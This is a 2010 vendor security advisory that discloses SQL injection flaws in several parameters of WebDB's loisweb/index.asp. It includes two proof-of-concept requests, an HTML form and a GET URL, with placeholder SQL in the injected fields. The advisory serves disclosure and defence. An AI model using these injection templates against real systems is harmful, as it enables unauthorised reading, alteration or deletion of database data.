SQL injection Vulnerabilities in WebDB

2010-06-10T00:00:00
ID HTB22429
Type htbridge
Reporter High-Tech Bridge
Modified 2010-06-11T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in WebDB which could be exploited to perform SQL injection attacks.

1) SQL injection vulnerabilities in WebDB
1.1 The vulnerability exists due to input sanitation errors in the multiple parameters in loisweb/index.asp. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in applications database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database. Exploitation example: <form action="http://host/loisweb/index.asp?topic=./links/search" method="POST" > <input type="hidden" name="qs" value="847" > <input type="hidden" name="Search0" value="' ANY_SQL_HERE" > <input type="hidden" name="Search1" value="' ANY_SQL_HERE" > <input type="hidden" name="Search2" value="' ANY_SQL_HERE" > <input type="hidden" name="Search3" value="' ANY_SQL_HERE" > <input type=submit> </form> 1.2 The vulnerability exists due to input sanitation errors in the “qt” parameter in loisweb/index.asp. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in applications database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
http://host/loisweb/index.asp?topic=./links/results&resultstype=1&qs=396&qt= +qaq++[5]+%3D+%27%27+ANY _SQL_HERE